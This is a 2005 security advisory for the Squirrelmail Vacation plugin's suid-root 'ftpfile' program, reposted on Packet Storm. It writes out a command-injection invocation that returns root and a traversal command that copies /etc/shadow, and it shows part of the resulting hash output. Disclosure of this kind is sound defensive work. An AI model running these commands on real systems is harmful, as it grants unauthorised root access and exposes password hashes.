LSS-2005-01-03.txt

12 Jan 2005 | Reported by Leon Juranic | Type: packetstorm | Source: packetstormsecurity.com

Local root exploit in Squirrelmail vacation plugin allows privilege escalation and file read.

Code
`  
LSS Security Advisory #LSS-2005-01-03  
http://security.lss.hr  
  
---  
  
Title : Squirrelmail vacation v0.15 local root exploit   
Advisory ID : LSS-2005-01-03  
Date : 10.01.2005.   
Advisory URL : http://security.lss.hr/en/index.php?page=details&ID=LSS-2005-01-03  
Impact : Privilege escalation and arbitrary file read  
Risk level : High   
Vulnerability type : Local  
Vendors contacted : No response from vendor  
  
  
---  
  
  
  
===[ Overview   
  
The Vacation plugin for Squirrelmail allows UNIX users to set an auto-reply  
message for incoming email. This is commonly used to notify the sender of  
the receiver's absence. The plugin specifically uses the Vacation program.  
The plugin can be downloaded from:  
http://www.squirrelmail.org/plugins/vacation0.15-1.43a.tar.gz  
  
  
  
===[ Vulnerability  
  
Within the Squirrelmail Vacation plugin there is a suid root program, 'ftpfile'.  
The program is used to access local files in a user's home directory. There is  
a privilege escalation and arbitrary file read vulnerability in ftpfile.  
Command line arguments are passed to the execve() function without being checked  
for meta-characters, which makes it possible to execute commands as root.  
  
[ljuranic@laptop ljuranic]$ id  
uid=509(ljuranic) gid=513(ljuranic) groups=513(ljuranic)  
[ljuranic@laptop ljuranic]$ ftpfile 0 root 0 get 0 "LSS-Security;id"  
/bin/cp: omitting directory `/root/0'  
uid=0(root) gid=513(ljuranic) groups=513(ljuranic)  
[ljuranic@laptop ljuranic]$   
  
It is also possible to read restricted files (such as /etc/shadow), since  
ftpfile can copy a file from the user's home directory to any other  
directory without checking the file name for directory traversal.  
  
$ ftpfile localhost root root get ../../../../etc/shadow ./shadow  
./shadow[ljuranic@laptop ljuranic]$ head ./shadow  
root:$1$Pwqt1daJ$DIe.fhBadNTN6d1br1OGy0:12401:0:99999:7:::  
bin:*:10929:0:99999:7:::  
daemon:*:10929:0:99999:7:::  
lp:*:10929:0:99999:7:::  
[ljuranic@laptop ljuranic]$   
  
  
  
===[ Affected versions  
  
Squirrelmail Vacation v0.15 and previous versions.  
  
  
  
===[ Fix  
  
Not available yet.  
  
  
  
===[ PoC Exploit  
  
http://security.lss.hr/exploits/  
  
  
  
===[ Credits  
  
Credit for this vulnerability goes to Leon Juranic.  
  
  
  
===[ LSS Security Contact  
  
LSS Security Team, <eXposed by LSS>  
  
WWW : http://security.lss.hr  
E-mail : [email protected]  
Tel : +385 1 6129 775  
  
  
  
`
